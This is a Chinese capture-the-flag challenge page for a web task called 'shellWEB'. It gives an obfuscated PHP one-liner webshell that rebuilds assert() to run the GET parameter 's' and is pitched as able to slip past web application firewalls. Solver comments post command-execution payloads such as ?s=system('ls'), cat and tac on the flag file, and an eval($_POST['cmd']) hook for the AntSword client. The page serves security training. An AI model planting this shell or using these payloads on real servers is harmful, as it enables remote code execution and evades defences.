shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6515
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
byhuang 14天前

flag{***}

回复 0

ubudj 1月前

分析代码,得到/?s=system(),用ls查看目录,找到文件。因为system函数能执行任何shell命令

回复 0

一个姓⎝李⎠的师傅~ 1月前

我的扩展里也解释了下,为何蚁剑能连接,大家可以看看,有不足的还希望互相探讨

回复 0

一个姓⎝李⎠的师傅~ 1月前

自己的解题思路:https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#hjui5

回复 0

wywsssf 1月前

AI分析代码,参数格式为?s=system(''),先用ls目录,再用cat读取txt文件

回复 0

Bruce20231767 1月前

这道题两个方法,一个是用蚁剑连接,url/?s=eval($_POST['cmd'])。另一个是参数s接可执行命令(根据提示)system("ls"),获取网站目录下内容,发现有一个flag相关的txt文件,可以再使用system("cat {...}txt")命令,或者直接url/{...}.txt来获取内容

回复 0

2686213396 2月前

首先,这个描述给出提示,poc按#进行分割化为数组由poc2承接,而根据php语言的变量函数特性,最后一个式子会转为assert($_GET['s']),所以目标就是对s的值进行操作,进而获取服务器上隐藏的数据。选用system函数进行ls系统命令,读取服务器上可能存在的flag文件,再通过cat进行获取,得到最终的flag

回复 2

zhuizhui 2月前

?s=system('cat fl*')

回复 0

lwgzs 3月前

kan le tishi

回复 0

涵十柒 3月前

描述 的最后一段 猜测传参s /?s=system('ls')发现有回显 直接/?s=system('tac 《题目给的flag文件名》.txt')

回复 1

WriteUp

image
harry

3 金币

评分(9)

解题动态

szb123 攻破了该题 2小时前
17361232956 攻破了该题 4小时前
皮蛋瘦肉粥 攻破了该题 4小时前
aaa1 攻破了该题 5小时前
初入CTF联盟 攻破了该题 7小时前
hahahahahahaha 攻破了该题 8小时前
GEcharacter 攻破了该题 8小时前
wujiayi 攻破了该题 12小时前
huangfeiyu 攻破了该题 13小时前
晚霞难掩秋色 攻破了该题 13小时前
Julia 攻破了该题 23小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 2天前
问题反馈